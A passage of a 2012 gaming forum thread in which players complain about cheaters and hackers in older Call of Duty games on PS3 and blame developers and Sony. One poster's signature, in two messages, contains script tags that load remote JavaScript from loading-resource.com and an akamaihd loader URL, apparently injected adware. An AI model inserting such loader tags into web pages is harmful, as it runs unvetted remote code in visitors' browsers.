Lombax Warrior
129 posts

Re: We Must Stop Hackers From destroying Call of Duty Games

[ Edited ]
Sep 5, 2012

Agreed. I admit I play more than I should but I take my licks like a man, if I get owned the oh well. Hacks are okay "in-house" with a group of friends PLAYING EACH OTHER and stuff doing it for fun but to go to the public lobbies s jsut being a **bleep**!!!

Pardon my French

Edit: profanity

Please use plain text.
Message 21 of 52 (255 Views)
0 Likes
First Son
3 posts

Sep 4, 2012

it's quite simple and i can see it even without my glasses. if you watch the vid ,this person is getting a headshot everytime while hip firing from a distance of almost half the map away from his target. at that distance its hard to get a headshot even looking down the sites unless you have a scope. i've run across the same thing in black ops and mw3 . when you're a good distance away from some one and they have a shotgun and are well out of it's range and they kill you with one shot , i cry foul .

Please use plain text.
Message 22 of 52 (252 Views)
0 Likes
Wastelander
921 posts

[ Edited ]
Sep 5, 2012

This kind of stuff happens all the time on PC because it is an open platform. I have never seen any sort of hacking of MW3 or Blops on the PS3. The reason hacking is so prominent on the PS3 in COD4 through MW2 is because those games had no built in security and relied on the security of the PS3. Once the PS3's security was hacked those games became wide open for hackers. IW has stated that it is pointless to patch the early COD games on PS3 as it would be bypassed within hours or even minutes. 

bren92 Trophy Card
Please use plain text.
Message 23 of 52 (237 Views)
0 Likes
Wastelander
766 posts

Sep 5, 2012

bren92 wrote:

This kind of stuff happens all the time on PC because it is an open platform. I have never seen any sort of hacking of MW3 or Blops on the PS3. The reason hacking is so prominent on the PS3 in COD4 through MW2 is because those games had no built in security and relied on the security of the PS3. Once the PS3's security was hacked those games became wide open for hackers. IW has stated that it is pointless to patch the early COD games on PS3 as it would be bypassed within hours or even minutes. 

good thing i dont have those games zzz

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Please use plain text.
Message 24 of 52 (234 Views)
0 Likes
I Only Post Everything
1130 posts

Sep 6, 2012

bren92 wrote:

The cheats/ hacks are mostly from idiots changing the game save data on a PC then putting it on a ps3. That has nothing to do with sony being hacked by "anon" or whatever. MAYBE MW2, WAW, and the original MW should get a patch that makes a player banned if they modify a save data file. Truth is no matter who is at fault its these low life people that have to cheat and hack COD games. I have friends that have xbox and its the same thing over there; cheating and hacking just like on ps3. I still blame it on the game developers.

Why do I blame it on the game devs? Just look at black ops. Its still not hacked. COD4, WAW, and MW2 are down right unplayable.

Please use plain text.
Message 25 of 52 (228 Views)
0 Likes
Fender Bender
3834 posts

Sep 7, 2012

jayistheway wrote:

bren92 wrote:

The cheats/ hacks are mostly from idiots changing the game save data on a PC then putting it on a ps3. That has nothing to do with sony being hacked by "anon" or whatever. MAYBE MW2, WAW, and the original MW should get a patch that makes a player banned if they modify a save data file. Truth is no matter who is at fault its these low life people that have to cheat and hack COD games. I have friends that have xbox and its the same thing over there; cheating and hacking just like on ps3. I still blame it on the game developers.

Why do I blame it on the game devs? Just look at black ops. Its still not hacked. COD4, WAW, and MW2 are down right unplayable.

BO and MW3 aren't hacked exactly because what Bren said. you have to go back to when the ps3s security was exposed by a single person, then a group using that knowledge, then that single person broke it wide open. previous cod games relied solely on the ps3s security. treyarch, in BO,  proactively added an extra layer of security on top of the ps3s security and IW used the same on MW3. 

when this all first happened, sony blamed the devs and the devs blamed sony. sony closed the hole on their end, but the games are still broken, so yes, i blame the devs/activision for them still being broken.

Please use plain text.
Message 26 of 52 (215 Views)
0 Likes
First Son
3 posts

Sep 12, 2012

there are tons of videos on youtube of ps3 owners and xbox owners alike showing them how aimbot and wallhack works and how to install the stealh packet. I been reporting them through the system. I actually called psn and ask how to report them so that the team that have set in place can view the vids and block their consoles. I personally block them so they wont appear in future games with me.

Hinkie
Please use plain text.
Message 27 of 52 (200 Views)
0 Likes
Wastelander
766 posts

Sep 12, 2012

smart but i still have yet to see a hacker in back ops :/

only form of cheaters i ever see are just the booster noobs

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Please use plain text.
Message 28 of 52 (197 Views)
0 Likes
Lombax Warrior
129 posts

Sep 12, 2012

Yeah I usually just get owned because of lag. There's NO way on some of my deaths I was NOT on site but then you look at the kill cam and the guy had the time to get me first. Is there a chance he was cheating (some sort of lag switch) yes but it's highly unlikely. I too have yet to see an obvious cheat like this on Black Ops. Like I said I usually leave a party/game when the lag on my end is bad, I don't mind losing but getting owned at no fault of your own sucks, so I just leave.

Please use plain text.
Message 29 of 52 (190 Views)
0 Likes
Gaming Beast
2331 posts

Sep 13, 2012

PRO_X__ZerO_CoOL wrote:

I never seen hacking in Black Ops.  

exactly!  theres times i will yell cheater or hacker at my TV, but then just realize they are better than me lol.   i mean, sometimes it does seem theres an aimbot or something. but maybe they are just that good.   funny, i sucked at the MW games, but do alright in black ops,  cant wait for black ops 2!

some_text
Please use plain text.
Message 30 of 52 (181 Views)
0 Likes